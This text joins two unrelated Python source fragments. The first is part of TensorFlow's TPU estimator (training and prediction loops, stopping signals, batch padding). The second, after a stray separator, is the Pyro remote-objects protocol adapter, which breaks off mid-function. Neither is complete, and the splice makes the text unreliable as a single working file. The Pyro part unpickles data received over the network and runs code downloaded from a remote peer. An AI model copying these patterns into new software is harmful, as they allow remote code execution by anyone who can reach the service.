model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(
iterations_per_loop_var,
single_tpu_train_step, [_INITIAL_LOSS])
(loss,) = tpu.shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
scaffold = _get_scaffold(captured_scaffold_fn)
return loss, host_call, scaffold
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
num_cores = ctx.num_cores
single_tpu_predict_step, host_calls, captured_scaffold_fn = (
model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn))
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(dummy_predict_op,) = tpu.shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=num_cores,
outputs_from_all_shards=False)
scaffold = _get_scaffold(captured_scaffold_fn)
return dummy_predict_op, host_calls, scaffold
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is atleast one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the Tensorflow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can be captured only. Please file bug .')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug .')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.Dataset):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer_hook(self):
"""Returns a `SessionRunHook` to initialize this dataset.
This must be called before `features_and_labels`.
"""
iterator = self._dataset.make_initializable_iterator()
# pylint: disable=protected-access
hook = estimator_lib._DatasetInitializerHook(iterator)
self._iterator = iterator
return hook
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must call dataset_initializer_hook '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self, dataset, batch_size, add_padding=False):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
dataset = user_provided_dataset.concatenate(final_batch_dataset).prefetch(2)
super(_InputsWithStoppingSignals, self).__init__(dataset=dataset)
self._current_inputs = None
def features_and_labels(self):
if self._current_inputs is not None:
raise RuntimeError(
'Internal Error: The previous inputs have not been properly '
'consumed. First call features_and_labels, then call signals.')
inputs_with_signals = self._iterator.get_next()
features = inputs_with_signals['features']
labels = inputs_with_signals.get('labels')
self._current_inputs = inputs_with_signals
return features, labels
def signals(self):
"""Returns the `Signals` from `_Inputs`."""
if self._current_inputs is None:
raise RuntimeError(
'Internal Error: The current inputs have not been properly '
'generated. First call features_and_labels, then call signals.')
signals = self._current_inputs['signals']
self._current_inputs = None
return signals
@staticmethod
def insert_stopping_signal(stop, batch_size, add_padding=False):
"""Inserts stopping_signal into dataset via _map_fn.
Here we change the data structure in the dataset, such that the return value
is a dictionary now and `features`, `labels`, and `signals` are three
distinguished keys in that dict. This provides a better structure, which
eases the process to decompose the inputs (see `features_and_labels`).
Args:
stop: bool, state of current stopping signals.
batch_size: int, batch size.
add_padding: bool, whether to pad the tensor to full batch size.
Returns:
A map_fn passed to dataset.map API.
"""
def _map_fn(*args):
"""The map fn to insert signals."""
if len(args) == 1:
# Unpack the single Tensor/dict argument as features. This is required
# for the input_fn returns no labels.
args = args[0]
features, labels = _Inputs._parse_inputs(args)
new_input_dict = {}
if add_padding:
padding_mask, features, labels = (
_PaddingSignals.pad_features_and_labels(
features, labels, batch_size))
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
else:
new_input_dict['features'] = features
if labels is not None:
new_input_dict['labels'] = labels
padding_mask = None
new_input_dict['signals'] = _StopSignals(
stop=stop, batch_size=batch_size, padding_mask=padding_mask).as_dict()
return new_input_dict
return _map_fn
class _StopSignals(object):
"""Signals class holding all logic to handle TPU stopping condition."""
NON_STOPPING_SIGNAL = False
STOPPING_SIGNAL = True
def __init__(self, stop, batch_size, padding_mask=None):
self._stop = stop
self._batch_size = batch_size
self._padding_mask = padding_mask
def as_dict(self):
"""Returns the signals as Python dict."""
shape = [self._batch_size, 1]
dtype = dtypes.bool
if self._stop:
stopping = array_ops.ones(shape=shape, dtype=dtype)
else:
stopping = array_ops.zeros(shape=shape, dtype=dtype)
signals = {'stopping': stopping}
if self._padding_mask is not None:
signals['padding_mask'] = self._padding_mask
return signals
@staticmethod
def as_scalar_stopping_signal(signals):
return array_ops.identity(signals['stopping'][0][0])
@staticmethod
def should_stop(scalar_stopping_signal):
if isinstance(scalar_stopping_signal, ops.Tensor):
# STOPPING_SIGNAL is a constant True. Here, the logical_and is just the TF
# way to express the bool check whether scalar_stopping_signal is True.
return math_ops.logical_and(
scalar_stopping_signal, _StopSignals.STOPPING_SIGNAL)
else:
# For non Tensor case, it is used in SessionRunHook. So, we cannot modify
# the graph anymore. Here, we use pure Python.
return bool(scalar_stopping_signal)
class _PaddingSignals(object):
"""Signals class holding all logic to handle padding."""
@staticmethod
def pad_features_and_labels(features, labels, batch_size):
"""Pads out the batch dimension of features and labels."""
real_batch_size = array_ops.shape(
_PaddingSignals._find_any_tensor(features))[0]
batch_size_tensor = constant_op.constant(batch_size, dtypes.int32)
check_greater = check_ops.assert_greater_equal(
batch_size_tensor, real_batch_size,
data=(batch_size_tensor, real_batch_size),
message='The real batch size should not be greater than batch_size.')
with ops.control_dependencies([check_greater]):
missing_count = batch_size_tensor - real_batch_size
def pad_single_tensor(tensor):
"""Pads out the batch dimension of a tensor to the complete batch_size."""
rank = len(tensor.shape)
assert rank > 0
padding = array_ops.stack([[0, missing_count]] + [[0, 0]] * (rank - 1))
padded_shape = (batch_size,) + tuple(tensor.shape[1:])
padded_tensor = array_ops.pad(tensor, padding)
padded_tensor.set_shape(padded_shape)
return padded_tensor
def nest_pad(tensor_or_dict):
return nest.map_structure(pad_single_tensor, tensor_or_dict)
features = nest_pad(features)
if labels is not None:
labels = nest_pad(labels)
padding_mask = _PaddingSignals._padding_mask(
real_batch_size, missing_count, batch_size)
return padding_mask, features, labels
@staticmethod
def slice_tensor_or_dict(tensor_or_dict, signals):
"""Slice the real Tensors according to padding mask in signals."""
padding_mask = signals['padding_mask']
batch_size = array_ops.shape(padding_mask)[0]
def verify_batch_size(tensor):
check_batch_size = math_ops.equal(batch_size, tensor.shape[0])
with ops.control_dependencies([check_batch_size]):
return array_ops.identity(tensor)
def slice_single_tensor(tensor):
rank = len(tensor.shape)
assert rank > 0
real_batch_size = batch_size - math_ops.reduce_sum(padding_mask)
return verify_batch_size(tensor)[0:real_batch_size]
# As we split the Tensors to all TPU cores and concat them back, it is
# important to ensure the real data is placed before padded ones, i.e.,
# order is preserved. By that, the sliced padding mask should have all 0's.
# If this assertion failed, # the slice logic here would not hold.
sliced_padding_mask = slice_single_tensor(padding_mask)
assert_padding_mask = math_ops.equal(
math_ops.reduce_sum(sliced_padding_mask), 0)
with ops.control_dependencies([assert_padding_mask]):
should_stop = _StopSignals.should_stop(
_StopSignals.as_scalar_stopping_signal(signals))
is_full_batch = math_ops.equal(math_ops.reduce_sum(padding_mask), 0)
def slice_fn(tensor):
# If the current batch is full batch or part of stopping signals, we do
# not need to slice to save performance.
return control_flow_ops.cond(
math_ops.logical_or(should_stop, is_full_batch),
(lambda: verify_batch_size(tensor)),
(lambda: slice_single_tensor(tensor)))
return nest.map_structure(slice_fn, tensor_or_dict)
@staticmethod
def _find_any_tensor(batch_features):
tensors = [x for x in nest.flatten(batch_features)
if isinstance(x, ops.Tensor)]
if not tensors:
raise ValueError('Cannot find any Tensor in features dict.')
return tensors[0]
@staticmethod
def _padding_mask(real_batch_size, missing_count, batch_size):
padding_mask = array_ops.concat(
[
array_ops.zeros((real_batch_size,), dtype=dtypes.int32),
array_ops.ones((missing_count,), dtype=dtypes.int32)
],
axis=0)
padding_mask.set_shape((batch_size,))
return padding_mask
class _SignalsHelper(object):
"""A general helper class to handle common signals manipulation."""
def __init__(self, signals):
self._signal_keys = []
for key in sorted(signals.iterkeys()):
self._signal_keys.append(key)
@property
def num_signals(self):
return len(self._signal_keys)
def unflatten(self, tensor_list):
return dict(zip(self._signal_keys, tensor_list))
@staticmethod
def as_tensor_list(signals):
return [signals[key] for key in sorted(signals.iterkeys())]
def _verify_cross_hosts_transfer_size(tensor_dict, message):
total_size = 0
tensor_structure = {}
for key, tensor in tensor_dict.items():
shape = tensor.shape
size = np.product(shape) * tensor.dtype.size
tensor_structure[key] = shape
total_size += size
if total_size >= _ONE_GIGABYTE:
raise ValueError(
'{} The transfer size is larger than the protobuf limit. Please '
'consider to use Tensors with smaller shapes or reduce batch '
'size. Given:\n'
'{}'.format(message, '\n'.join([
' -- Key: {}, Shape: {}'.format(k, v)
for k, v in tensor_structure.items()])))
|
protocol.py | #############################################################################
#
# $Id: protocol.py,v 2.94 2007/03/04 01:45:49 irmen Exp $
# Pyro Protocol Adapters
#
# This is part of "Pyro" - Python Remote Objects
# which is (c) Irmen de Jong - irmen@users.sourceforge.net
#
#############################################################################
import socket, struct, os, time, sys, md5, hmac, types, random
import imp, marshal, new, __builtin__
import Pyro
import util, constants
if os.name!='java': # Jython has no select module
import select, errno
from errors import *
from errors import _InternalNoModuleError
pickle = util.getPickle()
Log = util.Log
if util.supports_multithreading():
from threading import Thread,currentThread
_has_threading = 1
else:
_has_threading = 0
if util.supports_compression():
import zlib
_has_compression = 1
else:
_has_compression = 0
#------ Get the hostname (possibly of other machines) (returns None on error)
def getHostname(ip=None):
try:
if ip:
(hn,alias,ips) = socket.gethostbyaddr(ip)
return hn
else:
return socket.gethostname()
except socket.error:
return None
#------ Get IP address (return None on error)
def getIPAddress(host=None):
try:
return socket.gethostbyname(host or getHostname())
except socket.error:
return None
#------ Socket helper functions for sending and receiving data correctly.
# process optional timeout on socket.
# XXX replace this with python's native socket timeouts. M2Crypto (SSL) needs special care...
def _sock_timeout_send(sock, timeout):
ssl_select_okay=not hasattr(sock,'pending') or sock.pending()==0
if timeout and ssl_select_okay:
r,w,e=safe_select([],[sock],[],timeout)
if not w:
raise TimeoutError('connection timeout sending')
def _sock_timeout_recv(sock, timeout):
ssl_select_okay=not hasattr(sock,'pending') or sock.pending()==0
if timeout and ssl_select_okay:
r,w,e=safe_select([sock],[],[],timeout)
if not r:
raise TimeoutError('connection timeout receiving')
# Receive a precise number of bytes from a socket. Raises the
# ConnectionClosedError if that number of bytes was not available.
# (the connection has probably been closed then).
# Never will this function return an empty message (if size>0).
# We need this because 'recv' isn't guaranteed to return all desired
# bytes in one call, for instance, when network load is high.
# Use a list of all chunks and join at the end: faster!
def sock_recvmsg(sock, size, timeout=0):
if hasattr(sock,'pending'): # SSL socks have pending...
# when using SSL, other exceptions occur.
from M2Crypto.SSL import SSLError
try:
return _recv_msg(sock,size,timeout)
except SSLError:
raise ConnectionClosedError('connection lost')
else:
try:
return _recv_msg(sock,size,timeout)
except socket.error:
raise ConnectionClosedError('connection lost')
# select the optimal recv() implementation
if hasattr(socket.socket, "recvall"): # Irmen's custom socket module extension, see Python patch #1103213
def _recv_msg(sock,size,timeout):
_sock_timeout_recv(sock,timeout)
chunk=sock.recvall(size)
if len(chunk)!=size:
err=ConnectionClosedError('connection lost')
err.partialMsg=chunk # store the message that was received until now
raise err
return chunk
elif hasattr(socket,"MSG_WAITALL") and not Pyro.config.PYRO_BROKEN_MSGWAITALL:
def _recv_msg(sock,size,timeout):
_sock_timeout_recv(sock,timeout)
try:
chunk=sock.recv(size, socket.MSG_WAITALL) # receive all data in one call
except TypeError:
# XXX This is caused by a bug in the M2Crypto API, it doesn't like the MSG_WAITALL parameter
# Once the bug is fixed, the compat function can be rolled back into the _recv_msg below.
return __recv_msg_compat(sock,size,timeout)
else:
if len(chunk)!=size:
err=ConnectionClosedError('connection lost')
err.partialMsg=chunk # store the message that was received until now
raise err
return chunk
else:
def _recv_msg(sock,size,timeout):
_sock_timeout_recv(sock, timeout)
return __recv_msg_compat(sock,size,timeout)
def __recv_msg_compat(sock,size,timeout): # compatibility implementation for non-MSG_WAITALL / M2Crypto
msglen=0
msglist=[]
# Receive chunks of max. 60kb size:
# (rather arbitrary limit, but it avoids memory/buffer problems on certain OSes -- VAX/VMS, Windows)
while msglen<size:
chunk=sock.recv(min(60000,size-msglen))
if not chunk:
err = ConnectionClosedError('connection lost')
err.partialMsg=''.join(msglist) # store the message that was received until now
raise err
msglist.append(chunk)
msglen+=len(chunk)
return ''.join(msglist)
# Send a message over a socket. Raises ConnectionClosedError if the msg
# couldn't be sent (the connection has probably been lost then).
# We need this because 'send' isn't guaranteed to send all desired
# bytes in one call, for instance, when network load is high.
def sock_sendmsg(sock,msg,timeout=0):
try:
_sock_timeout_send(sock,timeout)
sock.sendall(msg)
except socket.error:
raise ConnectionClosedError('connection lost')
# set socket option to try to re-use a server port if possible
def set_reuse_addr(sock):
if os.name not in ('nt','dos','ce') and sys.platform!='cygwin':
# only do this on a non-windows platform. Windows screws things up with REUSEADDR...
try:
sock.setsockopt ( socket.SOL_SOCKET, socket.SO_REUSEADDR,
sock.getsockopt (socket.SOL_SOCKET, socket.SO_REUSEADDR) | 1)
except:
pass
# set socket option to enable timeout checking for server sockets.
def set_sock_keepalive(sock):
if Pyro.config.PYRO_SOCK_KEEPALIVE:
try:
sock.setsockopt ( socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1 )
except:
Pyro.config.PYRO_SOCK_KEEPALIVE=0 # it didn't work--disable keepalives.
#------ PYRO: adapter (default Pyro wire protocol)
#------ This adapter is for protocol version 4 ONLY
# Future adapters could be downwards compatible and more flexible.
PFLG_COMPRESSED = 0x01 # protocol flag: compressed body
PFLG_CHECKSUM = 0x02 # protocol flag: checksum body
PFLG_XMLPICKLE_GNOSIS = 0x04 # protocol flag: used xml pickling (Gnosis)
_agentImportLock=util.getLockObject()
_remoteImportRLock=util.getRLockObject()
class PYROAdapter:
headerFmt = '!4sHHlHl' # version 4 header (id, ver, hsiz,bsiz,pflags,crc)
headerID = 'PYRO'
connectMSG='CONNECT'
acceptMSG= 'GRANTED'
denyMSG= 'DENIED' # must be same length as acceptMSG,
# note that a 1-character code is appended!
AUTH_CHALLENGE_SIZE = 16
headerSize = struct.calcsize(headerFmt)
version=4 # version 4 protocol
def __init__(self):
self.onewayMethods=[] # methods that should be called one-way
self.timeout=None # socket timeout
self.ident='' # connection identification
self.setNewConnectionValidator(DefaultConnValidator())
def sendAccept(self, conn): # called by TCPServer
sock_sendmsg(conn.sock, self.acceptMSG, self.timeout)
def sendDeny(self, conn, reasonCode=constants.DENIED_UNSPECIFIED): # called by TCPServer
sock_sendmsg(conn.sock, self.denyMSG+str(reasonCode)[0], self.timeout)
def __del__(self):
self.release(nolog=1)
def recvAuthChallenge(self, conn):
ver,body,pflags = self.receiveMsg(conn)
if ver==self.version and len(body)==self.AUTH_CHALLENGE_SIZE:
return body
raise ValueError("Received version must be "+`self.version`+" and auth challenge must be exactly "+`self.AUTH_CHALLENGE_SIZE`+" bytes")
def setNewConnectionValidator(self,validator):
if not isinstance(validator, DefaultConnValidator):
raise TypeError("validator must be specialization of DefaultConnValidator")
self.newConnValidator=validator
def getNewConnectionValidator(self):
return self.newConnValidator
def bindToURI(self,URI):
# Client-side connection stuff. Use auth code from our own connValidator.
if URI.protocol not in ('PYRO', 'PYROLOC'):
Log.error('PYROAdapter','incompatible protocol in URI:',URI.protocol)
raise ProtocolError('incompatible protocol in URI')
try:
self.URI=URI.clone()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((URI.address, URI.port))
conn=TCPConnection(sock,sock.getpeername())
# receive the authentication challenge string, and use that to build the actual identification string.
try:
authChallenge=self.recvAuthChallenge(conn)
except ProtocolError,x:
# check if we were denied
if hasattr(x,"partialMsg") and x.partialMsg[:len(self.denyMSG)]==self.denyMSG:
raise ConnectionDeniedError(constants.deniedReasons[int(x.partialMsg[-1])])
else:
raise
# reply with our ident token, generated from the ident passphrase and the challenge
msg = self._sendConnect(sock,self.newConnValidator.createAuthToken(self.ident, authChallenge, conn.addr, self.URI, None) )
if msg==self.acceptMSG:
self.conn=conn
self.conn.connected=1
Log.msg('PYROAdapter','connected to',str(URI))
if URI.protocol=='PYROLOC':
self.resolvePYROLOC_URI("PYRO") # updates self.URI
elif msg[:len(self.denyMSG)]==self.denyMSG:
try:
raise ConnectionDeniedError(constants.deniedReasons[int(msg[-1])])
except (KeyError,ValueError):
raise ConnectionDeniedError('invalid response')
except socket.error:
Log.msg('PYROAdapter','connection failed to URI',str(URI))
raise ProtocolError('connection failed')
def resolvePYROLOC_URI(self, newProtocol):
# This method looks up the object URI referenced by
# the PYROLOC string, and updates self.URI in place!
objectName=self.URI.objectID
Log.msg('PYROAdapter','resolving PYROLOC name: ',objectName)
# call the special Resolve method on the daemon itself:
self.URI.objectID=constants.INTERNAL_DAEMON_GUID
result=self.remoteInvocation('ResolvePYROLOC',0,objectName)
# found it, switching to regular pyro protocol
self.URI.objectID=result
self.URI.protocol=newProtocol
def _sendConnect(self, sock, ident):
body=self.connectMSG+ident
sock_sendmsg(sock, self.createMsg(body), self.timeout)
return sock_recvmsg(sock, len(self.acceptMSG),self.timeout)
def release(self,nolog=0):
if hasattr(self,'conn'):
if not nolog:
Log.msg('PYROAdapter','releasing connection')
self.conn.close()
del self.conn
def connected(self):
if hasattr(self,'conn'):
return self.conn.connected
return 0
def rebindURI(self, tries=sys.maxint, wait=1):
t=0
while t<tries:
try:
self.bindToURI(self.URI)
return
except ProtocolError:
t+=1
if t<tries:
time.sleep(wait)
raise TimeoutError('connection lost')
def createMsg(self, body, replyflags=0):
pflgs=replyflags
if _has_compression and Pyro.config.PYRO_COMPRESSION:
before=len(body)
bz=zlib.compress(body) # default compression level
if len(bz)<before:
pflgs|=PFLG_COMPRESSED
body=bz
crc=0
if Pyro.config.PYRO_CHECKSUM and _has_compression:
crc=zlib.adler32(body)
pflgs|=PFLG_CHECKSUM
if Pyro.config.PYRO_XML_PICKLE=='gnosis':
pflgs|=PFLG_XMLPICKLE_GNOSIS
return struct.pack(self.headerFmt, self.headerID, self.version, self.headerSize, len(body), pflgs, crc) + body
def setOneway(self, methods):
self.onewayMethods.extend(methods)
def setTimeout(self, timeout):
self.timeout=timeout
def setIdentification(self, ident, munge=True):
if ident:
if munge:
self.ident=self.newConnValidator.mungeIdent(ident) # don't store ident itself.
else:
self.ident=ident # per-munged ident string
else:
self.ident=''
def getIdentification(self):
return self.ident
# Retrieve code from the remote peer. Works recursively.
def _retrieveCode(self, mname, level):
# XXX this is nasty code, and also duplicated in core.py remote_supply_code()
if mname in sys.modules:
# module is already loaded, do nothing
# XXX how can we be sure if the module is "complete"?
# XXX because things might go wrong during the loading code below?
return
try:
_remoteImportRLock.acquire()
# Called by the client-side to obtain code from the server-side.
# Call the special method on the server to retrieve the code.
# No need for complex exception stuff like when the server needs
# code from the client (see handleInvocation): because the server
# is a Pyro object we can actually *call* it :-)
module = self.remoteInvocation("remote_retrieve_code",0,mname)
mname = mname.split('.')
path = ''
mod = new.module("pyro-server-context")
for m in mname:
path += '.' + m
# use already loaded modules instead of overwriting them
real_path = path[1:]
if sys.modules.has_key(real_path):
mod = sys.modules[real_path]
else:
setattr(mod, m, new.module(real_path))
mod = getattr(mod, m)
sys.modules[real_path] = mod
if module[0:4] != imp.get_magic():
code = compile(module, "<downloaded>", "exec")
else:
code = marshal.loads(module[8:])
importer=None
try:
loaded = 0
# XXX probably want maxtries here...
while not loaded:
# install a custom importer to intercept any extra needed modules
# when executing the module code just obtained from the server
_agentImportLock.acquire()
importer = agent_import(__builtin__.__import__)
__builtin__.__import__ = importer
_agentImportLock.release()
try:
exec code in mod.__dict__
loaded = 1
except ImportError:
mname = importer.name
if importer is not None:
__builtin__.__import__ = importer.orig_import
importer = None
# XXX probably want maxrecursion here...
self._retrieveCode(mname, level+1)
finally:
if importer is not None:
__builtin__.__import__ = importer.orig_import
finally:
_remoteImportRLock.release()
def remoteInvocation(self, method, flags, *args):
if 'conn' not in self.__dict__.keys():
Log.msg('PYROAdapter','no connection, trying to bind again')
if 'URI' in self.__dict__.keys():
self.bindToURI(self.URI)
else:
raise ProtocolError('trying to rebind, but was never bound before')
if method in self.onewayMethods:
flags |= constants.RIF_Oneway
body=pickle.dumps((self.URI.objectID,method,flags,args),Pyro.config.PYRO_PICKLE_FORMAT)
sock_sendmsg(self.conn.sock, self.createMsg(body), self.timeout)
if flags & constants.RIF_Oneway:
return None # no answer required, return immediately
ver,answer,pflags = self.receiveMsg(self.conn,1)
if answer is None:
raise ProtocolError('incorrect answer received')
# Try to get the answer from the server.
# If there are import problems, try to get those modules from
# the server too (if mobile code is enabled).
if not Pyro.config.PYRO_MOBILE_CODE:
answer = pickle.loads(answer)
else:
importer=None
try:
_remoteImportRLock.acquire()
loaded = 0
# XXX maxtries here...
while not loaded:
# install a custom importer to intercept any extra needed modules
# when unpickling the answer just obtained from the server
_agentImportLock.acquire()
importer = agent_import(__builtin__.__import__)
__builtin__.__import__ = importer
_agentImportLock.release()
try:
answer = pickle.loads(answer)
loaded = 1
except ImportError:
mname = importer.name
if importer is not None:
__builtin__.__import__ = importer.orig_import
importer = None
self._retrieveCode(mname, 0)
finally:
if importer is not None:
__builtin__.__import__ = importer.orig_import
_remoteImportRLock.release()
if isinstance(answer,PyroExceptionCapsule):
if isinstance(answer.excObj,_InternalNoModuleError):
# server couldn't load module, supply it
# XXX this code is ugly. and duplicated in remote_retrieve_code in core.py
try:
importmodule=new.module('-agent-import-')
mname=answer.excObj.modulename
# not used: fromlist=answer.excObj.fromlist
try:
exec 'import '+mname in importmodule.__dict__
except ImportError:
Log.error('PYROAdapter','Server wanted a non-existing module:',mname)
raise PyroError('Server wanted a non-existing module',mname)
m=eval('importmodule.'+mname)
bytecode=None
if hasattr(m,"_PYRO_bytecode"):
# use the bytecode that was put there earlier,
# this avoids recompiles of the source .py if we don't have .pyc bytecode available
bytecode=m._PYRO_bytecode
else:
# try to load the module's compiled source, or the real .py source if that fails.
# note that the source code (.py) is opened with universal newline mode
if not hasattr(m,"__file__"):
raise PyroError("cannot read module source code",mname)
(filebase,ext)=os.path.splitext(m.__file__)
if ext.startswith(".PY"):
exts = ( (".PYO","rb"), (".PYC","rb"), (".PY","rU") ) # uppercase
else:
exts = ( (".pyo","rb"), (".pyc","rb"), (".py","rU") ) # lowercase
for ext,mode in exts:
try:
bytecode=open(filebase+ext, mode).read()
break
except EnvironmentError:
pass
if bytecode:
self.remoteInvocation("remote_supply_code",0,mname, bytecode, self.conn.sock.getsockname())
# retry the method invocation
return self.remoteInvocation(* (method, flags)+args)
Log.error("PYROAdapter","cannot read module source code for module:", mname)
raise PyroError("cannot read module source code",mname)
finally:
del importmodule
else:
# we have an encapsulated exception, raise it again.
answer.raiseEx()
return answer
# (private) receives a socket message, returns: (protocolver, message, protocolflags)
def receiveMsg(self,conn,noReply=0):
msg=sock_recvmsg(conn.sock, self.headerSize, self.timeout)
(hid, ver, hsiz, bsiz, pflags, crc) = struct.unpack(self.headerFmt,msg)
# store in the connection what pickle method this is
if pflags&PFLG_XMLPICKLE_GNOSIS:
conn.pflags|=PFLG_XMLPICKLE_GNOSIS
if ver!=self.version:
Log.error('PYROAdapter','incompatible protocol version')
if noReply:
raise ProtocolError('incompatible protocol version')
else:
# try to report error to client, but most likely the connection will terminate:
self.returnException(conn, ProtocolError('incompatible protocol version'))
return ver,None,pflags
if hid!=self.headerID or hsiz!=self.headerSize:
Log.error('PYROAdapter','invalid header')
Log.error('PYROAdapter','INVALID HEADER DETAILS: ',conn,( hid, ver, hsiz, bsiz,pflags))
# try to report error to client, but most likely the connection will terminate:
self.returnException(conn, ProtocolError('invalid header'), shutdown=1)
return ver,None,pflags
body=sock_recvmsg(conn.sock, bsiz, self.timeout)
if pflags&PFLG_CHECKSUM:
if _has_compression:
if crc!=zlib.adler32(body):
Log.error('PYROAdapter','checksum error in body')
self.returnException(conn, ProtocolError('checksum error'))
return ver,None,pflags
else:
raise ProtocolError('cannot perform checksum')
if pflags&PFLG_COMPRESSED:
if _has_compression:
body=zlib.decompress(body)
else:
# We received a compressed message but cannot decompress.
# Is this really a server error? We now throw an exception on the server...
raise ProtocolError('compression not supported')
return ver,body,pflags
def _unpickleRequest(self, pflags, body):
if pflags&PFLG_XMLPICKLE_GNOSIS:
if Pyro.config.PYRO_XML_PICKLE=='gnosis':
return pickle.loads(body)
else:
return util.getXMLPickle('gnosis').loads(body)
elif Pyro.config.PYRO_XML_PICKLE:
Log.error('PYROAdapter','xml pickle required, got other pickle')
raise ProtocolError('xml pickle required, got other pickle')
else:
return pickle.loads(body)
def handleInvocation(self,daemon,conn):
ver,body,pflags = self.receiveMsg(conn)
if not body:
# something went wrong even before receiving the full message body
return
if ver!=self.version:
Log.error('PYROAdapter','incompatible protocol version')
self.returnException(conn, ProtocolError('incompatible protocol version'))
return
# Unpickle the request, which is a tuple:
# (object ID, method name, flags, (arg1,arg2,...))
importer=fromlist=None
try:
try:
# install a custom importer to intercept any extra needed modules
# when unpickling the request just obtained from the client
_agentImportLock.acquire()
importer=agent_import(__builtin__.__import__)
__builtin__.__import__=importer
_agentImportLock.release()
req=self._unpickleRequest(pflags, body)
if type(req)!=type(()):
raise TypeError("REQUESTDATA ISN'T A TUPLE")
finally:
__builtin__.__import__=importer.orig_import
except ImportError,x:
if Pyro.config.PYRO_MOBILE_CODE:
